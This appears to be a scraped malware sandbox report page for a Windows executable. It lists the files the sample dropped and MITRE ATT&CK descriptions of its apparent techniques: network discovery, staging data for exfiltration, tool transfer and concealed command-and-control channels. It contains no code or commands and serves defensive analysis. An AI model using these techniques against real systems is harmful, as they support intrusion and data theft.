Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_4288f330dd69d220cd91c4da994b8eb932b2c82_85207d7d_92460402-3569-4cd0-877c-2429d52e9106\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D62.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DA1.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DAE.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E3C.tmp.txt

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Current.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\YZRVUYjilL.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PT54FFSL7ET46RASB.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\l6E.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
PT54FFSL7ET46RASB.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre